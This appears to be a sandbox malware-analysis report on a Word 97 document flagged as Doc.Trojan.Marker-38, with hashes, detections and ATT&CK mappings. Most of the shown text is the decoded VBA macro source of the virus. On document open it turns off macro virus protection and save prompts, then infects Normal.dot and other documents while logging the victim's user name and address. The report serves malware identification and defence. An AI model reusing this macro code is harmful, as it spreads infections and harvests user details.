Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8162604999f2873…

MALICIOUS

Office (OLE)

37.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a2b9c3e8a908399104d41048b3e2db2e SHA-1: 8ab0d6ae1d65e4d941cc4380782fccfa431cdfac SHA-256: c8162604999f2873772c3446b743a19ff947549a4842316936de10224d3d01f8
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The script attempts to disable virus protection and save prompts, and searches for a marker string 'BLowMaster' within the document and normal template, suggesting an attempt to inject or modify VBA code. This indicates a likely attempt to establish persistence or further compromise the system via macro execution.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-38 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-38
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13726 bytes
SHA-256: 7c0b997035b21c97dfa11068286ba3844f3832540b75a4827c63408bf2f5099f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open(): IT
End Sub
Private Function IT()
        
    'Application.Options.ConfirmConversions = False: Application.EnableCancelKey = wdCancelDisabled
    'FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable: FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    'CommandBars("Tools").Controls("Macro").Enabled = False
    'If Application.Version = 9# Then: CommandBars("Macro").Controls("Security...").Enabled = 0
    'If Application.Version = 8# Then
        'With Application.Options: .VirusProtection = False: .SaveNormalPrompt = False: End With
    'End If
    
    newf
    
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
            
End Function

Private Function newf()

    Dim maker, Oldmaker
    
    maker = "BLowMaster"
    Options.SaveNormalPrompt = False
    Dim SavDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
    Options.SaveNormalPrompt = False
    Oldmaker = "-> this is another maker!"
    Dim newd, nt As Object
    Options.SaveNormalPrompt = False
    
    Set newd = ActiveDocument.VBProject.VBComponents.Item(1)
    Options.SaveNormalPrompt = False
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    Options.SaveNormalPrompt = False
           
    
    DocumentInfected = newd.CodeModule.Find(maker, 1, 1, 10000, 10000)
    Options.SaveNormalPrompt = False
    NormalTemplateInfected = nt.CodeModule.Find(maker, 1, 1, 10000, 10000)
    Options.SaveNormalPrompt = False
    
    
    'Make sure that some conditions are true before we continue infecting anything
    If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
        (ActiveDocument.SaveFormat = wdFormatDocument Or _
        ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
        Options.SaveNormalPrompt = False
        'Infect the NormalTemplate
        If DocumentInfected = True Then
  
            SaveNormalTemplate = NormalTemplate.Saved
            Options.SaveNormalPrompt = False
  
            Mycode = newd.CodeModule.Lines(1, newd.CodeModule.CountOfLines)

            'Write a log file of this NormalTemplate infection
            For I = 1 To Len(Application.UserAddress)
                If Mid(Application.UserAddress, I, 1) <> Chr(13) Then
                    If Mid(Application.UserAddress, I, 1) <> Chr(10) Then
                        UserAddress = UserAddress & Mid(Application.UserAddress, I, 1)
                        Options.SaveNormalPrompt = False
                    End If
                Else
                    UserAddress = UserAddress & Chr(13) & "' "
                    Options.SaveNormalPrompt = False
                End If
            Next I

            Mycode = Mycode & Chr(13) & _
                      "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                      Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
                      "' " & Application.UserName & Chr(13) & _
                      "' " & UserAddress & Chr(13)


            nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
            nt.CodeModule.AddFromString Mycode
    
            If SaveNormalTemplate = True Then NormalTemplate.Save
    
        End If


        'Infect the ActiveDocument
        If NormalTemplateInfected = True And _
            (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
             ActiveDocument.Saved = False) Then
  
            SavDocument = ActiveDocument.Saved
            Options.SaveNormalPrompt = False
    
            Mycode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

            newd.CodeModule.DeleteLines 1, newd.CodeModule.CountOfLines
            newd.CodeModule.AddFromString Mycode
    
            If SavDocument = True Then ActiveDocument.Save
      
      
... (truncated)